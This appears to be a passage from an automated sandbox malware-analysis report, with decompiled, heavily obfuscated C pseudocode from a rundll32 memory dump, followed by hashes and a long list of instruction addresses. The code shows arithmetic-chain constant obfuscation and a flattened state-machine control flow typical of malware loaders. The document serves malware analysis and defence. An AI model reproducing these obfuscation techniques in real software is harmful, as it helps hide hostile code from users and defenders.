                                                                      				void* _t364;
                                                                      				void* _t401;
                                                                      				signed int _t407;
                                                                      				signed int _t408;
                                                                      				void* _t418;
                                                                      				signed int _t424;
                                                                      				void* _t467;
                                                                      				signed int _t477;
                                                                      				signed int _t479;
                                                                      				signed int _t480;
                                                                      				signed int _t481;
                                                                      				signed int _t482;
                                                                      				signed int _t483;
                                                                      				signed int _t484;
                                                                      				signed int _t485;
                                                                      				signed int _t486;
                                                                      				signed int _t487;
                                                                      				signed int _t488;
                                                                      				signed int _t489;
                                                                      				intOrPtr* _t492;
                                                                      				signed int* _t494;
                                                                      
                                                                      				_push(_a24);
                                                                      				_t492 = __ecx;
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t364);
                                                                      				_v1640 = _v1640 & 0x00000000;
                                                                      				_t494 =  &(( &_v1792)[8]);
                                                                      				_v1652 = 0x2764d0;
                                                                      				_v1648 = 0x6c10e;
                                                                      				_t418 = 0x1a59bf6e;
                                                                      				_v1644 = 0x45b7d3;
                                                                      				_v1736 = 0x69d7;
                                                                      				_t479 = 0x7c;
                                                                      				_v1736 = _v1736 / _t479;
                                                                      				_v1736 = _v1736 ^ 0x22ae46e4;
                                                                      				_v1736 = _v1736 ^ 0x22ae462e;
                                                                      				_v1692 = 0x6229;
                                                                      				_t480 = 0x2d;
                                                                      				_v1692 = _v1692 * 0x79;
                                                                      				_v1692 = _v1692 ^ 0x002e5d85;
                                                                      				_v1668 = 0x3eca;
                                                                      				_v1668 = _v1668 * 0x4a;
                                                                      				_v1668 = _v1668 ^ 0x001246b9;
                                                                      				_v1664 = 0xb443;
                                                                      				_v1664 = _v1664 ^ 0x9e62129a;
                                                                      				_v1664 = _v1664 ^ 0x9e62966b;
                                                                      				_v1776 = 0xc910;
                                                                      				_v1776 = _v1776 ^ 0xd3b19c76;
                                                                      				_v1776 = _v1776 * 0x5f;
                                                                      				_v1776 = _v1776 >> 4;
                                                                      				_v1776 = _v1776 ^ 0x08ec90a2;
                                                                      				_v1724 = 0x4482;
                                                                      				_v1724 = _v1724 | 0x42708b7b;
                                                                      				_v1724 = _v1724 + 0xddd;
                                                                      				_v1724 = _v1724 ^ 0x4270d568;
                                                                      				_v1688 = 0xa58d;
                                                                      				_v1688 = _v1688 / _t480;
                                                                      				_v1688 = _v1688 ^ 0x00002f12;
                                                                      				_v1768 = 0x1117;
                                                                      				_v1768 = _v1768 ^ 0xb27fbd06;
                                                                      				_v1768 = _v1768 ^ 0xbad7b42c;
                                                                      				_v1768 = _v1768 << 5;
                                                                      				_v1768 = _v1768 ^ 0x1503361b;
                                                                      				_v1748 = 0x59e9;
                                                                      				_t481 = 0x76;
                                                                      				_v1748 = _v1748 / _t481;
                                                                      				_v1748 = _v1748 * 0x1b;
                                                                      				_v1748 = _v1748 ^ 0x0000781f;
                                                                      				_v1712 = 0x12f;
                                                                      				_v1712 = _v1712 >> 1;
                                                                      				_v1712 = _v1712 * 0x54;
                                                                      				_v1712 = _v1712 ^ 0x000029cb;
                                                                      				_v1760 = 0x769d;
                                                                      				_v1760 = _v1760 ^ 0x1d97fecb;
                                                                      				_v1760 = _v1760 | 0x5a049cf7;
                                                                      				_v1760 = _v1760 >> 8;
                                                                      				_v1760 = _v1760 ^ 0x005fdabd;
                                                                      				_v1680 = 0x560a;
                                                                      				_t482 = 0x67;
                                                                      				_v1680 = _v1680 / _t482;
                                                                      				_v1680 = _v1680 ^ 0x00006cbe;
                                                                      				_v1716 = 0x4a9b;
                                                                      				_t483 = 0x3e;
                                                                      				_v1716 = _v1716 / _t483;
                                                                      				_v1716 = _v1716 << 2;
                                                                      				_v1716 = _v1716 ^ 0x00001699;
                                                                      				_v1756 = 0xfd39;
                                                                      				_t484 = 0x41;
                                                                      				_v1756 = _v1756 / _t484;
                                                                      				_t485 = 0x3c;
                                                                      				_v1756 = _v1756 / _t485;
                                                                      				_v1756 = _v1756 >> 2;
                                                                      				_v1756 = _v1756 ^ 0x000009f3;
                                                                      				_v1656 = 0x263f;
                                                                      				_v1656 = _v1656 | 0xdd3deb07;
                                                                      				_v1656 = _v1656 ^ 0xdd3d9735;
                                                                      				_v1728 = 0x8b60;
                                                                      				_v1728 = _v1728 + 0x7c61;
                                                                      				_v1728 = _v1728 >> 3;
                                                                      				_v1728 = _v1728 ^ 0x00004a7c;
                                                                      				_v1720 = 0x33cd;
                                                                      				_v1720 = _v1720 ^ 0x1b0fa94f;
                                                                      				_v1720 = _v1720 >> 5;
                                                                      				_v1720 = _v1720 ^ 0x00d8342d;
                                                                      				_v1780 = 0x296b;
                                                                      				_t477 = 0xd;
                                                                      				_t486 = 0x1a;
                                                                      				_v1780 = _v1780 * 0x37;
                                                                      				_v1780 = _v1780 / _t477;
                                                                      				_v1780 = _v1780 * 0x68;
                                                                      				_v1780 = _v1780 ^ 0x00477104;
                                                                      				_v1708 = 0x1071;
                                                                      				_v1708 = _v1708 / _t486;
                                                                      				_v1708 = _v1708 ^ 0x39e628e5;
                                                                      				_v1708 = _v1708 ^ 0x39e60ecd;
                                                                      				_v1792 = 0xc8ec;
                                                                      				_v1792 = _v1792 + 0xffff9509;
                                                                      				_v1792 = _v1792 << 0x10;
                                                                      				_v1792 = _v1792 / _t477;
                                                                      				_v1792 = _v1792 ^ 0x073a38a1;
                                                                      				_v1672 = 0xf01f;
                                                                      				_v1672 = _v1672 | 0x8a618a9f;
                                                                      				_v1672 = _v1672 ^ 0x8a61a479;
                                                                      				_v1772 = 0x51a6;
                                                                      				_v1772 = _v1772 << 2;
                                                                      				_t487 = 0x2c;
                                                                      				_v1772 = _v1772 / _t487;
                                                                      				_v1772 = _v1772 >> 5;
                                                                      				_v1772 = _v1772 ^ 0x000035c3;
                                                                      				_v1764 = 0xe721;
                                                                      				_v1764 = _v1764 ^ 0x24f6807f;
                                                                      				_t488 = 0x53;
                                                                      				_v1764 = _v1764 / _t488;
                                                                      				_v1764 = _v1764 + 0xbfd3;
                                                                      				_v1764 = _v1764 ^ 0x00728456;
                                                                      				_v1660 = 0x1e86;
                                                                      				_v1660 = _v1660 ^ 0x7c17f37e;
                                                                      				_v1660 = _v1660 ^ 0x7c17e05e;
                                                                      				_v1684 = 0xd777;
                                                                      				_v1684 = _v1684 + 0xed5a;
                                                                      				_v1684 = _v1684 ^ 0x0001edaa;
                                                                      				_v1744 = 0xa784;
                                                                      				_v1744 = _v1744 + 0xc02;
                                                                      				_t489 = 0x29;
                                                                      				_v1744 = _v1744 / _t489;
                                                                      				_v1744 = _v1744 ^ 0x000021c6;
                                                                      				_v1696 = 0xdd82;
                                                                      				_v1696 = _v1696 << 7;
                                                                      				_v1696 = _v1696 ^ 0x006e89a7;
                                                                      				_v1784 = 0x58c6;
                                                                      				_v1784 = _v1784 << 0xd;
                                                                      				_v1784 = _v1784 * 0x62;
                                                                      				_v1784 = _v1784 ^ 0x296c6eed;
                                                                      				_v1784 = _v1784 ^ 0x1615de11;
                                                                      				_v1676 = 0x84dc;
                                                                      				_v1676 = _v1676 << 1;
                                                                      				_v1676 = _v1676 ^ 0x00016dc5;
                                                                      				_v1740 = 0x8068;
                                                                      				_v1740 = _v1740 | 0xa8a101a8;
                                                                      				_v1740 = _v1740 >> 5;
                                                                      				_v1740 = _v1740 ^ 0x0545556d;
                                                                      				_v1732 = 0x2f98;
                                                                      				_v1732 = _v1732 ^ 0x2890ad27;
                                                                      				_v1732 = _v1732 >> 0xe;
                                                                      				_v1732 = _v1732 ^ 0x0000a37e;
                                                                      				_v1788 = 0x1e3f;
                                                                      				_v1788 = _v1788 >> 5;
                                                                      				_v1788 = _v1788 | 0x9899bc79;
                                                                      				_v1788 = _v1788 ^ 0x98e78ce9;
                                                                      				_v1788 = _v1788 ^ 0x007e0a8e;
                                                                      				_v1700 = 0x100b;
                                                                      				_v1700 = _v1700 | 0xf8dcacc8;
                                                                      				_v1700 = _v1700 ^ 0xf8dcd529;
                                                                      				_t478 = _v1700;
                                                                      				_v1752 = 0x332;
                                                                      				_v1752 = _v1752 << 0xb;
                                                                      				_v1752 = _v1752 + 0x818f;
                                                                      				_v1752 = _v1752 << 9;
                                                                      				_v1752 = _v1752 ^ 0x342347ac;
                                                                      				_v1704 = 0xaa58;
                                                                      				_v1704 = _v1704 >> 8;
                                                                      				_v1704 = _v1704 * 0x6a;
                                                                      				_v1704 = _v1704 ^ 0x000062e9;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t467 = 0x2e;
                                                                      					L2:
                                                                      					while(_t418 != 0x15b4e3) {
                                                                      						if(_t418 == 0xae29669) {
                                                                      							__eflags = _v1636 & _v1736;
                                                                      							if(__eflags == 0) {
                                                                      								_t407 =  *_t492( &_v1636, _a12);
                                                                      								asm("sbb ecx, ecx");
                                                                      								_t424 =  ~_t407 & 0x021254c5;
                                                                      								L9:
                                                                      								_t418 = _t424 + 0x2bde9c80;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t467 = 0x2e;
                                                                      									goto L2;
                                                                      								}
                                                                      							}
                                                                      							__eflags = _v1592 - _t467;
                                                                      							if(_v1592 != _t467) {
                                                                      								L19:
                                                                      								__eflags = _a20;
                                                                      								if(__eflags != 0) {
                                                                      									_push(0x1ff13dc);
                                                                      									_push(_v1780);
                                                                      									_push(_v1720);
                                                                      									E01FFA4D7(__eflags, _v1792, _v1672, _v1772, _v1764, E01FF5DFC(_v1656, _v1728, __eflags), _a24,  &_v524,  &_v1592);
                                                                      									E01FFD6F0(_t492, _v1660, _v1684, _v1744, _a12, _v1696, _a20,  &_v524);
                                                                      									_t408 = E02000D6D(_v1784, _v1676, _v1740, _t411);
                                                                      									_t494 =  &(_t494[0x13]);
                                                                      									_t467 = 0x2e;
                                                                      								}
                                                                      								L18:
                                                                      								_t418 = 0x2df0f145;
                                                                      								continue;
                                                                      							}
                                                                      							__eflags = _v1590;
                                                                      							if(__eflags == 0) {
                                                                      								goto L18;
                                                                      							}
                                                                      							__eflags = _v1590 - _t467;
                                                                      							if(_v1590 != _t467) {
                                                                      								goto L19;
                                                                      							}
                                                                      							__eflags = _v1588;
                                                                      							if(__eflags != 0) {
                                                                      								goto L19;
                                                                      							}
                                                                      							goto L18;
                                                                      						}
                                                                      						if(_t418 == 0xe2dbff4) {
                                                                      							_t408 = E02009952( &_v1636,  &_v1044, _v1716, _v1756);
                                                                      							_t478 = _t408;
                                                                      							__eflags = _t408 - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								return _t408;
                                                                      							}
                                                                      							_t418 = 0xae29669;
                                                                      							goto L1;
                                                                      						}
                                                                      						if(_t418 == 0x1a59bf6e) {
                                                                      							_t418 = 0x15b4e3;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t418 == 0x2bde9c80) {
                                                                      							return E01FF991E(_v1700, _v1752, _t478, _v1704);
                                                                      						}
                                                                      						if(_t418 != 0x2df0f145) {
                                                                      							L23:
                                                                      							__eflags = _t418 - 0xd3f8960;
                                                                      							if(__eflags != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							return _t408;
                                                                      						}
                                                                      						_t408 = E01FF327F(_t478, _v1732,  &_v1636, _v1788);
                                                                      						asm("sbb ecx, ecx");
                                                                      						_t424 =  ~_t408 & 0xdf03f9e9;
                                                                      						goto L9;
                                                                      					}
                                                                      					_push(0x1ff140c);
                                                                      					_push(_v1776);
                                                                      					_push(_v1664);
                                                                      					_t401 = E01FF5DFC(_v1692, _v1668, __eflags);
                                                                      					E01FFECBD(_v1724, __eflags, _v1692, _v1688, _v1768,  &_v1044, _v1748, _a24);
                                                                      					E02000D6D(_v1712, _v1760, _v1680, _t401);
                                                                      					_t494 =  &(_t494[0xb]);
                                                                      					_t418 = 0xe2dbff4;
                                                                      					_t467 = 0x2e;
                                                                      					goto L23;
                                                                      				}
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !$)b$?&$Z$k)$|J$(9$Y$b$nl)
                                                                      • API String ID: 0-1587503975
                                                                      • Opcode ID: 8f7746d2232358b4ed4bb68738b37b67922b47cda3fa2272ab6ef43d0dfae9a6
                                                                      • Instruction ID: 61c6442bad652ea5a987252e70f42e1c024f5d79024041364fa9494507b9f34a
                                                                      • Opcode Fuzzy Hash: 8f7746d2232358b4ed4bb68738b37b67922b47cda3fa2272ab6ef43d0dfae9a6
                                                                      • Instruction Fuzzy Hash: 9F02037150C3809FE368CF65C58AA5BBBE1BFC4748F10891DE299862A0D7BA9549CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E0200AA7B(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                      				char _v1;
                                                                      				char _v96;
                                                                      				char _v108;
                                                                      				char _v112;
                                                                      				char _v116;
                                                                      				char _v120;
                                                                      				char* _v124;
                                                                      				char _v128;
                                                                      				signed int _v132;
                                                                      				signed int _v136;
                                                                      				signed int _v140;
                                                                      				signed int _v144;
                                                                      				signed int _v148;
                                                                      				signed int _v152;
                                                                      				signed int _v156;
                                                                      				signed int _v160;
                                                                      				signed int _v164;
                                                                      				signed int _v168;
                                                                      				signed int _v172;
                                                                      				signed int _v176;
                                                                      				signed int _v180;
                                                                      				signed int _v184;
                                                                      				signed int _v188;
                                                                      				signed int _v192;
                                                                      				signed int _v196;
                                                                      				signed int _v200;
                                                                      				signed int _v204;
                                                                      				signed int _v208;
                                                                      				signed int _v212;
                                                                      				signed int _v216;
                                                                      				signed int _v220;
                                                                      				signed int _v224;
                                                                      				signed int _v228;
                                                                      				signed int _v232;
                                                                      				signed int _v236;
                                                                      				signed int _v240;
                                                                      				signed int _v244;
                                                                      				intOrPtr _v248;
                                                                      				intOrPtr _v252;
                                                                      				void* _t311;
                                                                      				intOrPtr _t340;
                                                                      				intOrPtr _t341;
                                                                      				void* _t342;
                                                                      				void* _t344;
                                                                      				intOrPtr _t346;
                                                                      				signed int _t348;
                                                                      				signed int _t352;
                                                                      				intOrPtr* _t360;
                                                                      				signed int _t362;
                                                                      				intOrPtr* _t366;
                                                                      				intOrPtr _t368;
                                                                      				intOrPtr* _t373;
                                                                      				char* _t403;
                                                                      				signed int _t405;
                                                                      				signed int _t406;
                                                                      				signed int _t407;
                                                                      				signed int _t408;
                                                                      				signed int _t409;
                                                                      				signed int _t410;
                                                                      				signed int _t411;
                                                                      				signed int _t412;
                                                                      				signed int _t413;
                                                                      				char* _t414;
                                                                      				void* _t415;
                                                                      				intOrPtr* _t422;
                                                                      				void* _t424;
                                                                      				void* _t426;
                                                                      
                                                                      				_t366 = _a8;
                                                                      				_push(_t366);
                                                                      				_push(_a4);
                                                                      				_t422 = __ecx;
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t311);
                                                                      				_v240 = 0x8d7c;
                                                                      				_t424 =  &_v252 + 0x10;
                                                                      				_t368 = 0;
                                                                      				_t415 = 0x41ccc75;
                                                                      				_v252 = 0;
                                                                      				_t405 = 0x25;
                                                                      				_v240 = _v240 / _t405;
                                                                      				_t406 = 0x2f;
                                                                      				_v240 = _v240 / _t406;
                                                                      				_v240 = _v240 << 2;
                                                                      				_v240 = _v240 ^ 0x00000010;
                                                                      				_v224 = 0x614;
                                                                      				_v224 = _v224 + 0xffff1e90;
                                                                      				_v224 = _v224 >> 9;
                                                                      				_v224 = _v224 + 0x14db;
                                                                      				_v224 = _v224 ^ 0x0080146f;
                                                                      				_v168 = 0x43df;
                                                                      				_v168 = _v168 + 0xffffc722;
                                                                      				_v168 = _v168 ^ 0xb717614c;
                                                                      				_v168 = _v168 ^ 0xb71706dd;
                                                                      				_v176 = 0xf537;
                                                                      				_v176 = _v176 + 0xffffdb03;
                                                                      				_v176 = _v176 | 0xc83cfdf5;
                                                                      				_v176 = _v176 ^ 0xc83cf680;
                                                                      				_v156 = 0x6ab9;
                                                                      				_v156 = _v156 >> 4;
                                                                      				_v156 = _v156 ^ 0x00005a76;
                                                                      				_v212 = 0x1163;
                                                                      				_v212 = _v212 + 0xb834;
                                                                      				_v212 = _v212 | 0x5ab100ea;
                                                                      				_v212 = _v212 << 0x10;
                                                                      				_v212 = _v212 ^ 0xc9ff2941;
                                                                      				_v184 = 0x14b7;
                                                                      				_v184 = _v184 + 0xffff4460;
                                                                      				_v184 = _v184 >> 9;
                                                                      				_v184 = _v184 ^ 0x007fa2da;
                                                                      				_v220 = 0xa2fe;
                                                                      				_v220 = _v220 ^ 0x26ae9f9f;
                                                                      				_v220 = _v220 + 0x1a1;
                                                                      				_v220 = _v220 + 0xce68;
                                                                      				_v220 = _v220 ^ 0x26af665c;
                                                                      				_v228 = 0x162a;
                                                                      				_v228 = _v228 ^ 0x1700eeb5;
                                                                      				_v228 = _v228 << 1;
                                                                      				_v228 = _v228 ^ 0x4a6b2f0a;
                                                                      				_v228 = _v228 ^ 0x646a9864;
                                                                      				_v136 = 0x1819;
                                                                      				_v136 = _v136 * 0x25;
                                                                      				_v136 = _v136 ^ 0x000331ed;
                                                                      				_v160 = 0x36ca;
                                                                      				_v160 = _v160 ^ 0xc92c8b7e;
                                                                      				_v160 = _v160 ^ 0xc92cce0d;
                                                                      				_v148 = 0xc5b6;
                                                                      				_v148 = _v148 * 0x7e;
                                                                      				_v148 = _v148 ^ 0x00614dee;
                                                                      				_v140 = 0xa97e;
                                                                      				_v140 = _v140 + 0xa055;
                                                                      				_v140 = _v140 ^ 0x000126a3;
                                                                      				_v172 = 0xe032;
                                                                      				_v172 = _v172 * 0x70;
                                                                      				_v172 = _v172 << 9;
                                                                      				_v172 = _v172 ^ 0xc42bfcc6;
                                                                      				_v216 = 0xe61f;
                                                                      				_v216 = _v216 | 0xbe443d33;
                                                                      				_v216 = _v216 ^ 0x414ec713;
                                                                      				_t407 = 0x43;
                                                                      				_v216 = _v216 / _t407;
                                                                      				_v216 = _v216 ^ 0x03ce199c;
                                                                      				_v192 = 0x9a2f;
                                                                      				_v192 = _v192 | 0xaa1149b7;
                                                                      				_v192 = _v192 ^ 0x2682361c;
                                                                      				_v192 = _v192 ^ 0x8c93a9a4;
                                                                      				_v152 = 0x8d56;
                                                                      				_t408 = 0x7f;
                                                                      				_v152 = _v152 * 0x29;
                                                                      				_v152 = _v152 ^ 0x0016ef6a;
                                                                      				_v236 = 0xbc0b;
                                                                      				_v236 = _v236 << 0xd;
                                                                      				_v236 = _v236 + 0xffff7a12;
                                                                      				_v236 = _v236 << 6;
                                                                      				_v236 = _v236 ^ 0xe036fcaf;
                                                                      				_v144 = 0x49e;
                                                                      				_v144 = _v144 / _t408;
                                                                      				_v144 = _v144 ^ 0x000069ed;
                                                                      				_v244 = 0x2abb;
                                                                      				_t409 = 0x6f;
                                                                      				_v244 = _v244 / _t409;
                                                                      				_v244 = _v244 + 0xffff3ff3;
                                                                      				_v244 = _v244 << 7;
                                                                      				_v244 = _v244 ^ 0xffa00c82;
                                                                      				_v232 = 0x26d8;
                                                                      				_v232 = _v232 + 0xffffe69b;
                                                                      				_v232 = _v232 + 0x4f22;
                                                                      				_t410 = 0x3c;
                                                                      				_v232 = _v232 / _t410;
                                                                      				_v232 = _v232 ^ 0x00004984;
                                                                      				_v188 = 0x4ffd;
                                                                      				_v188 = _v188 | 0xb7e6561e;
                                                                      				_v188 = _v188 >> 0xc;
                                                                      				_v188 = _v188 ^ 0x000b053b;
                                                                      				_v180 = 0x9e1b;
                                                                      				_v180 = _v180 + 0xffffc996;
                                                                      				_v180 = _v180 | 0x10dfcda5;
                                                                      				_v180 = _v180 ^ 0x10dfd69b;
                                                                      				_v196 = 0x4e8f;
                                                                      				_t411 = 0x74;
                                                                      				_v196 = _v196 / _t411;
                                                                      				_v196 = _v196 + 0xe77b;
                                                                      				_v196 = _v196 ^ 0x0000e576;
                                                                      				_v132 = 0xd692;
                                                                      				_t412 = 0x77;
                                                                      				_v132 = _v132 / _t412;
                                                                      				_v132 = _v132 ^ 0x0000067d;
                                                                      				_v164 = 0xe38a;
                                                                      				_t413 = 0x1d;
                                                                      				_t414 = _v124;
                                                                      				_v164 = _v164 / _t413;
                                                                      				_v164 = _v164 ^ 0x0000547b;
                                                                      				_v208 = 0x28b1;
                                                                      				_v208 = _v208 + 0xffff4814;
                                                                      				_v208 = _v208 << 9;
                                                                      				_v208 = _v208 ^ 0xfee1d162;
                                                                      				_v200 = 0x7d21;
                                                                      				_v200 = _v200 ^ 0x0b7eb81b;
                                                                      				_v200 = _v200 | 0x5335bde4;
                                                                      				_v200 = _v200 ^ 0x5b7f914c;
                                                                      				_v204 = 0xd16;
                                                                      				_v204 = _v204 + 0xffff7a95;
                                                                      				_v204 = _v204 + 0xffffd877;
                                                                      				_v204 = _v204 ^ 0xffff6023;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t398 = _v248;
                                                                      					do {
                                                                      						while(1) {
                                                                      							L2:
                                                                      							_t426 = _t415 - 0x994cea2;
                                                                      							if(_t426 > 0) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t426 == 0) {
                                                                      								E02000FE4(_t368, _v128);
                                                                      								_t415 = 0x15dfcb81;
                                                                      								goto L9;
                                                                      							} else {
                                                                      								if(_t415 == 0x1d2cb9a) {
                                                                      									_v116 = 0x6c;
                                                                      									_t340 =  *0x2010400; // 0x0
                                                                      									_t341 =  *0x2010400; // 0x0
                                                                      									_t342 = E0200C3F6(_v236, _v240,  *((intOrPtr*)(_t341 + 0x18)), _v204, _v144, _v244, _v232, _v188,  *((intOrPtr*)(_t340 + 0x10)),  &_v108,  &_v116);
                                                                      									_t424 = _t424 + 0x24;
                                                                      									if(_t342 == 0) {
                                                                      										_t415 = 0x994cea2;
                                                                      									} else {
                                                                      										_t373 =  &_v1;
                                                                      										_t403 = _t414;
                                                                      										do {
                                                                      											 *_t403 =  *_t373;
                                                                      											_t403 = _t403 + 1;
                                                                      											_t373 = _t373 - 1;
                                                                      										} while (_t373 >=  &_v96);
                                                                      										_t415 = 0x479469f;
                                                                      									}
                                                                      									goto L9;
                                                                      								} else {
                                                                      									if(_t415 == 0x41ccc75) {
                                                                      										_t415 = 0x2c907ec6;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t415 == 0x479469f) {
                                                                      											_v112 = 0x14;
                                                                      											_t263 = _t414 + 0x60; // 0x60
                                                                      											_t344 = E01FF97D9(_t263, _v128, _t368, _v180,  &_v112, _v196, _v132, _v224, _v164);
                                                                      											_t368 = _v252;
                                                                      											_t424 = _t424 + 0x1c;
                                                                      											_t398 = _v248;
                                                                      											if(_t344 == 0) {
                                                                      												continue;
                                                                      											} else {
                                                                      												_t415 = 0x994cea2;
                                                                      												_t368 = 1;
                                                                      												_v252 = 1;
                                                                      												goto L1;
                                                                      											}
                                                                      											L34:
                                                                      										} else {
                                                                      											if(_t415 != 0x65513b8) {
                                                                      												goto L32;
                                                                      											} else {
                                                                      												_t346 =  *0x2010400; // 0x0
                                                                      												_t348 = E020031B5(_v124,  &_v120, _v140, _v172, _v128, _v216, _t368, _t398, _v192, _v152,  *((intOrPtr*)(_t346 + 0x10)));
                                                                      												_t424 = _t424 + 0x28;
                                                                      												asm("sbb esi, esi");
                                                                      												_t415 = ( ~_t348 & 0xf83dfcf8) + 0x994cea2;
                                                                      												L9:
                                                                      												_t368 = _v252;
                                                                      												while(1) {
                                                                      													L1:
                                                                      													_t398 = _v248;
                                                                      													goto L2;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L33;
                                                                      						}
                                                                      						if(_t415 == 0x15dfcb81) {
                                                                      							if(_t368 == 0) {
                                                                      								E01FFDE81(_v156,  *_t366, _v212);
                                                                      								_t368 = _v252;
                                                                      							}
                                                                      							_t415 = 0x1160f48c;
                                                                      							goto L32;
                                                                      						} else {
                                                                      							if(_t415 == 0x269afaf2) {
                                                                      								E01FF6374(_v160, _t398, _a4,  *_t422, _v148);
                                                                      								_t424 = _t424 + 0xc;
                                                                      								_t415 = 0x65513b8;
                                                                      								goto L9;
                                                                      							} else {
                                                                      								if(_t415 == 0x2c907ec6) {
                                                                      									_t352 = _a4 + 1;
                                                                      									if((_t352 & 0x0000000f) != 0) {
                                                                      										_t352 = (_t352 & 0xfffffff0) + 0x10;
                                                                      									}
                                                                      									 *((intOrPtr*)(_t366 + 4)) = _t352 + 0x74;
                                                                      									_push(_t368);
                                                                      									_t414 = E01FF54FB( *((intOrPtr*)(_t366 + 4)));
                                                                      									 *_t366 = _t414;
                                                                      									if(_t414 != 0) {
                                                                      										_t297 = _t414 + 0x74; // 0x74
                                                                      										_t398 = _t297;
                                                                      										_t368 = _v252;
                                                                      										_t415 = 0x3b15e045;
                                                                      										_v120 = _a4;
                                                                      										_v248 = _t297;
                                                                      										_v124 =  *((intOrPtr*)(_t366 + 4)) - 0x74;
                                                                      										goto L2;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t415 != 0x3b15e045) {
                                                                      										goto L32;
                                                                      									} else {
                                                                      										_t360 =  *0x2010400; // 0x0
                                                                      										_t362 = E01FF72A4(_v184,  &_v128, _v220, _v228, _t368, _v136,  *_t360);
                                                                      										_t424 = _t424 + 0x18;
                                                                      										asm("sbb esi, esi");
                                                                      										_t415 = ( ~_t362 & 0x10bb2f71) + 0x15dfcb81;
                                                                      										goto L9;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						break;
                                                                      						L32:
                                                                      						_t398 = _v248;
                                                                      					} while (_t415 != 0x1160f48c);
                                                                      					L33:
                                                                      					return _v252;
                                                                      					goto L34;
                                                                      				}
                                                                      			}
                                                                      0x0200ae8a
                                                                      0x0200ae92
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200ae9e
                                                                      0x0200ae9e
                                                                      0x0200ae9e
                                                                      0x0200ae9e
                                                                      0x0200aea4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200aeaa
                                                                      0x0200b031
                                                                      0x0200b037
                                                                      0x00000000
                                                                      0x0200aeb0
                                                                      0x0200aeb6
                                                                      0x0200afa5
                                                                      0x0200afb9
                                                                      0x0200afd8
                                                                      0x0200afe8
                                                                      0x0200afed
                                                                      0x0200aff2
                                                                      0x0200b018
                                                                      0x0200aff4
                                                                      0x0200aff4
                                                                      0x0200affb
                                                                      0x0200affd
                                                                      0x0200afff
                                                                      0x0200b001
                                                                      0x0200b002
                                                                      0x0200b00a
                                                                      0x0200b00e
                                                                      0x0200b00e
                                                                      0x00000000
                                                                      0x0200aebc
                                                                      0x0200aec2
                                                                      0x0200af94
                                                                      0x00000000
                                                                      0x0200aec8
                                                                      0x0200aece
                                                                      0x0200af41
                                                                      0x0200af68
                                                                      0x0200af6b
                                                                      0x0200af70
                                                                      0x0200af74
                                                                      0x0200af77
                                                                      0x0200af7d
                                                                      0x00000000
                                                                      0x0200af83
                                                                      0x0200af85
                                                                      0x0200af8a
                                                                      0x0200af8b
                                                                      0x00000000
                                                                      0x0200af8b
                                                                      0x00000000
                                                                      0x0200aed0
                                                                      0x0200aed6
                                                                      0x00000000
                                                                      0x0200aedc
                                                                      0x0200aedc
                                                                      0x0200af13
                                                                      0x0200af18
                                                                      0x0200af1f
                                                                      0x0200af27
                                                                      0x0200af2d
                                                                      0x0200af2d
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x00000000
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200aed6
                                                                      0x0200aece
                                                                      0x0200aec2
                                                                      0x0200aeb6
                                                                      0x00000000
                                                                      0x0200aeaa
                                                                      0x0200b047
                                                                      0x0200b12b
                                                                      0x0200b137
                                                                      0x0200b13d
                                                                      0x0200b13d
                                                                      0x0200b141
                                                                      0x00000000
                                                                      0x0200b04d
                                                                      0x0200b053
                                                                      0x0200b117
                                                                      0x0200b11c
                                                                      0x0200b11f
                                                                      0x00000000
                                                                      0x0200b059
                                                                      0x0200b05f
                                                                      0x0200b0b2
                                                                      0x0200b0b5
                                                                      0x0200b0ba
                                                                      0x0200b0ba
                                                                      0x0200b0c0
                                                                      0x0200b0ce
                                                                      0x0200b0d4
                                                                      0x0200b0d6
                                                                      0x0200b0db
                                                                      0x0200b0e0
                                                                      0x0200b0e0
                                                                      0x0200b0e3
                                                                      0x0200b0e7
                                                                      0x0200b0ec
                                                                      0x0200b0f9
                                                                      0x0200b0fd
                                                                      0x00000000
                                                                      0x0200b0fd
                                                                      0x0200b061
                                                                      0x0200b067
                                                                      0x00000000
                                                                      0x0200b06d
                                                                      0x0200b06d
                                                                      0x0200b090
                                                                      0x0200b095
                                                                      0x0200b09c
                                                                      0x0200b0a4
                                                                      0x00000000
                                                                      0x0200b0a4
                                                                      0x0200b067
                                                                      0x0200b05f
                                                                      0x0200b053
                                                                      0x00000000
                                                                      0x0200b146
                                                                      0x0200b146
                                                                      0x0200b14a
                                                                      0x0200b156
                                                                      0x0200b164
                                                                      0x00000000
                                                                      0x0200b164

                                                                      Strings
                                                                      Memory Dump Source
